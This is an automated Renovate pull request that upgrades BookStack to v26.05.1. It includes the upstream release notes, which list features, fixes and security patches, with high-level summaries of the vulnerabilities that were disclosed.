⬆️ Update BookStackApp/BookStack to v26

[renovate]

This PR contains the following updates:

Package	Update	Change
BookStackApp/BookStack	major	v25.12.2 → v26.05.1

---

Release Notes

BookStackApp/BookStack (BookStackApp/BookStack)

v26.05.1: BookStack v26.05.1

Compare Source

Security Release

• Update Instructions
• Update details on blog

This is a security release to address the following vulnerabilities:

• Attachment requests could be manipulated to leak details/links/metadata (not content) of attachments which the user did not have permission to view.
• The file:// protocol could be abused in some Windows-specific scenarios to auto-run requests with credential information when viewing exports.
  • This protocol is now filtered from interactive content.
• The search system could be abused to cause errors and fill logs.

Upgrade is advised for instances with public viewing enabled, or where untrusted users have authenticated access.

Thanks to Stephen O. / Sakusen (Codeberg, Website), Gurmandeep Deol (LinkedIn), Rafael Castilho (X account) and Gabriel Duarte Guerra (GitHub) for responsibly reporting these issues.

Full List of Changes

• Updated PHP package versions.
• Updated translations with the latest Crowdin changes.
• Updated content allow-filtering to only allow the file:// protocol on anchor hrefs, instead of in all dynamic content.
• Updated attachment update handling to validate permissions before request content.
• Fixed numeric handling issue in tag search when using non-standard numbers.

v26.05: BookStack v26.05

Compare Source

Links

• Release video overview
• Update instructions
• Update details on blog

Upgrade Notices

• Folder Permissions - Due to some changes in how fonts are used for exports, after updating you may need to ensure that the storage/fonts folder (and all folders within that) are accessible & writable by the web-server. If you start seeing errors on PDF export after updating, it's likely this issue. See this page for guidance on setting permissions.
• Revision Access - Revision access & visibility is now controlled separately to pages. In some cases, after upgrading, users may no longer be able to access revisions by default (for example, where users had access to view page content but had no role-level view permissions).

Full List of Changes

• Added page contents view to page editor. (#​6131, #​4218)
• Added API endpoints for browsing tags. (#​6095, #​5835)
• Added custom font load handling for default PDF renderer. (#​6109, #​148, #​719, #​5770)
• Added in-UI option to reset user multi-factor authentication methods. Thanks to @​clauvaldez. (#​6056)
• Added hints to sort rule selection alongside empty lists. (#​5967)
• Added specific permission for revision viewing. (#​6108, #​4526)
• Added new image and CSS CSP controls. Thanks to @​Zhey-on. (#​6071, #​6033)
• Added Thai language support. (#​6105)
• Updated codebase to meet PHPStan Level 4. (#​6085)
• Updated comment/description WYSIWYG editor to support inline code. (#​6100, #​6003)
• Updated HTML to plain text conversion handling. (#​6083)
• Updated image upload handling to validate referenced page. (#​6126)
• Updated JavaScript packages. (#​6090)
• Updated module install command with usability improvements. (#​6094, #​6066)
• Updated new WYSIWYG editor with a range of fixes. (#​6119, #​5631)
• Updated translations with latest Crowdin changes. (#​6084)
• Fixed misaligned link attachment validation rules. (#​6093)
• Fixed non-ascii character issues in headers on PDF exports. Thanks to @​alexwoo-awso. (#​6069, #​6107)

v26.03.5: BookStack v26.03.5

Compare Source

Security Release

• Update Instructions
• Update details on blog

This is a security release to address a brute-force based vulnerability related to multi-factor authentication, and to update project libraries to help avoid potential vulnerabilities that have been reported in those.

Upgrade is generally advised, but strongly so where multi-factor authentication is used & considered as a critical layer of defense.

Thanks to Stephen O. / Sakusen (Codeberg, Website) for responsibly reporting these issues.

Full List of Changes

• Updated PHP package versions.
• Updated MFA verification routes with rate limiting.

v26.03.4: BookStack v26.03.4

Compare Source

Security Release

• Update Instructions
• Update details on blog

This is a security release to improve attachment related permission checks, and URL validation for webhooks.

Upgrade is advised if you allow untrusted users to delete attachments, or if untrusted users have permission to create webhooks on instances which make use of the ALLOWED_SSR_HOSTS BookStack env file option.

Thanks to 404_pkj (GitHub) and naruhodoowl (GitHub) for responsibly reporting these issues.

Full List of Changes

• Updated PHP package versions.
• Updated attachment actions to align page access check.
• Updated URL validation in webhooks to help prevent escaping workarounds.
• Fixed issue where exact search term negation would lead to no results. (#​6121)

v26.03.3: BookStack v26.03.3

Compare Source

Links

• Update instructions

Full List of Changes

This release contains the following fixes and changes:

• Updated translations with latest Crowdin changes. (#​6067)
• Updated PHP dependency versions.

v26.03.2: BookStack v26.03.2

Compare Source

Security Release

• Update Instructions
• Update details on blog

This is a security release to address a vulnerability where the registration form could be manipulated to gain access to additional roles.

Upgrade is very strongly advised if your instance has user registration enabled.

Thanks to Kwonyong Lee (LinkedIn) for responsibly reporting this issue.
Also thanks to Boustani OSAMA (LinkedIn) for also reporting this before public announcement.

Full List of Changes

• Updated user creation to only use validated input from registration.
• Updated PHP package versions.
• Updated translations with latest Crowdin changes. (#​6064)
• Updated PHP_CodeSniffer repository link. Thanks to @​rodrigoprimo. (#​6060)
• Updated WYSIWYG editors to have consistent collapsible block double click behavior. (#​6059)

v26.03.1: BookStack v26.03.1

Compare Source

Security Release

• Update Instructions
• Update details on blog

This is a security release to address a vulnerability where page content, which should be hidden by permissions, could be visible during certain markdown exports.

We strongly advise that you update your instance if you use permissions to control page visibility.

Thanks to Ghufran Raza Khan (GitHub Profile, LinkedIn Profile) for responsibly reporting this issue.
Also thanks to Alex Dan (GitHub Profile) for also reporting this before public announcement.

Full List of Changes

• Updated queries used for pages in markdown exports.
• Updated handling of filenames for file serving.
• Updated PHP package versions.

v26.03: BookStack v26.03

Compare Source

Links

• Release video overview
• Update instructions
• Update details on blog

Upgrade Notices

• Email/SMTP - The way BookStack sends messages has changed slightly (Specifically, the SMTP HELO domain). This isn't expected to be a breaking change but testing of emails (Using the test send action in Settings > Maintenance) is advised after updating to be sure there's no impact.
• Theme System - Within a theme directory, the modules/ folder is now dedicated to theme modules. If you happened to already have a folder of this name in your theme, it's advised to use a different folder name instead.

Full List of Changes

Released in v26.03

• Added new module system to the theme system. (#​5998)
• Added logical theme events for page content render and pre-save. (#​6049)
• Added logical theme event and class to allow inserting custom views before/after others. (#​5998)
• Added logical theme event to allow customising the OIDC authentication URL. (#​6014)
• Updated book delete to return to the parent shelf in a shelf context. (#​6029)
• Updated book read API endpoint to provide parent shelf information. (#​6006)
• Updated cursor to pointer for drawio diagrams. Thanks to @​lublak. (#​5864)
• Updated description for per-page display limits. (#​6005)
• Updated emails to use the domain from the APP_URL in the SMTP HELO. (#​5990)
• Updated translations with latest Crowdin changes. (#​6007)
• Fixed empty extra space showing for descriptions when the input is left empty. (#​5724)

v25.12.9: BookStack v25.12.9

Compare Source

Security Release

• Update Instructions
• Update details on blog

BookStack v25.12.9 has been released.

This is a security release to address a vulnerability where style code in page content could be used to manipulate the page beyond the expected content area in some revision views, opening up risk of potential phishing and/or tracking by bad page editors.

We advise that you update your instance if you allow untrusted users to create or edit pages.

Thanks to Alex Dan (@​windbreaker555 on GitHub) for their responsible discovery and reporting of this issue.

Full List of Changes

• Updated page revision diffs to use content filtering.
• Updated preference change redirect with stronger origin checks.
• Updated application PHP dependencies.

v25.12.8: BookStack v25.12.8

Compare Source

Links

• Update instructions

Full List of Changes

This release contains the following fixes and changes:

• Fixed content filtering removing link target attribute, which would impact "New Window" links. (#​6034)
• Fixed content filtering to not remove user references in comments.
• Updated PHP package versions.

v25.12.7: BookStack v25.12.7

Compare Source

This release specifically addresses a scenario, introduced in v25.12.4, where loading the editor of a page, last updated/created by a different user with blank content, would result in an error.

Links

• Update instructions

Full List of Changes

This release contains the following fixes and changes:

• Updated page document handling to handle empty content instead of throwing an error. (#​6026)

v25.12.6: BookStack v25.12.6

Compare Source

This release specifically addresses issues introduced in v25.12.4, where drawings could become non-editable in certain scenarios due to content filtering rules.

Links

• Update instructions

Full List of Changes

This release contains the following fixes and changes:

• Updated content filter to allow required drawio diagram attributes. (#​6026)

v25.12.5: BookStack v25.12.5

Compare Source

This release specifically addresses folder permission issues (often showing as an error when attempting to access content) which could occur from changes introduced in v25.12.4.

Links

• Update instructions

Full List of Changes

This release contains the following fixes and changes:

• Updated filter caching folder handling to avoid server filesystem permission issues. (#​6023)

v25.12.4: BookStack v25.12.4

Compare Source

Security Release

• Update Instructions
• Update details on blog

BookStack v25.12.4 has been released.

This is a security release to address a vulnerability where style code in page content could be used to manipulate the page beyond the expected content area, opening up risk of potential phishing and/or tracking by bad page editors.

We advise that you update your instance if you allow untrusted users to create or edit pages.

Thanks to SeongYun Moon (@​Moonster8282 on GitHub) for their responsible discovery and reporting of this issue.

Additional Update Notices

• Page Content - As of this release, extra layers of filtering have been applied to page content. While we have tried to ensure this has minimal impact on content, it's possible this will lead to extra elements being filtered.
• Option Change - The ALLOW_CONTENT_SCRIPTS env option is now considered deprecated. It's advised to use the APP_CONTENT_FILTERING option, as documented here, instead if needed.

If you experience issues with your page content being over-filtered feel free to raise an issue on GitHub where we can check if the behaviour is intentional or something which needs to be patched.

You can use the new page content filtering option, with a value of jhf which should match the prior version filtering, but this will remove a layer of content filtering security so is not recommend.

Full List of Changes

• Added new option for more granular page filter control.
• Updated page content filtering to detect extra cases, and to apply a more aggressive allow-list style filter.
• Updated application PHP dependencies.

v25.12.3: BookStack v25.12.3

Compare Source

Security Release

• Update Instructions
• Update details on blog

BookStack v25.12.3 has been released.

This is a security release to address a vulnerability where form elements in page content could be used to trick more privileged users into making API requests.

We strongly advise that you update your instance if you allow untrusted users to create or edit pages.

Thanks to Joud Zakharia of zentrust partners GmbH for the discovery of this vulnerability, and thanks to Sven Faßbender of zentrust partners GmbH for their responsible disclosure and great communication of this issue.

Additional Update Notices

• Page Content - As of this release, most types of form content are now removed from page content on render. If you applied customizations which made use of in-page form content, you may now need to find alternative methods.

Full List of Changes

• Updated application PHP dependencies.
• Updated session-based API authentication to only be active for GET requests.
• Updated page content filtering to remove many common form elements & attributes.
• Updated translations with latest Crowdin changes. (#​5997)

---

Configuration

📅 Schedule: (UTC)

• Branch creation
  • At any time (no schedule defined)
• Automerge
  • At any time (no schedule defined)

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.